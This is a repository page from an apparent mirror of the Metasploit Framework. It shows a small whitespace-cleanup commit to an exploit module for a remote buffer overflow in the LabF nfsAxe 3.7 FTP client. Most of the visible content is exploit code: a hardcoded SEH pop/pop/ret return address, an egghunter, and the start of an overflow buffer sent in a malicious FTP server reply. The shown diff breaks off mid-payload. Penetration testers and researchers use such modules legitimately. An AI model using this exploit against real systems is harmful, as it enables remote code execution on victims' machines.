infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update labf_nfsaxe.rb

MS-2855/keylogger-mettle-extension
Daniel Teixeira 2018-01-05 18:46:33 +00:00 committed by GitHub
parent e7946549d7
commit b97785c7a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/windows/ftp/labf_nfsaxe.rb
View File

@ -10,14 +10,13 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Seh include Msf::Exploit::Seh
include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::Egghunter
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow', 'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution. This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
}, },
'Author' => 'Author' =>
[ [
'Tulpa', # Original exploit author 'Tulpa', # Original exploit author
'Daniel Teixeira' # MSF module author 'Daniel Teixeira' # MSF module author
@ -34,12 +33,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll [ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
], ],
'Privileged' => false, 'Privileged' => false,
'DefaultOptions' => 'DefaultOptions' =>
{ {
'SRVHOST' => '0.0.0.0', 'SRVHOST' => '0.0.0.0',
}, },
'DisclosureDate' => 'May 15 2017', 'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -65,10 +64,10 @@ class MetasploitModule < Msf::Exploit::Remote
pass = "230 OK.\r\n" pass = "230 OK.\r\n"
client.put(pass) client.put(pass)
client.get_once client.get_once
eggoptions = { :checksum => true } eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
sploit = "220 \"" sploit = "220 \""
sploit << "A"*(9833 - egg.length) sploit << "A"*(9833 - egg.length)
sploit << egg sploit << egg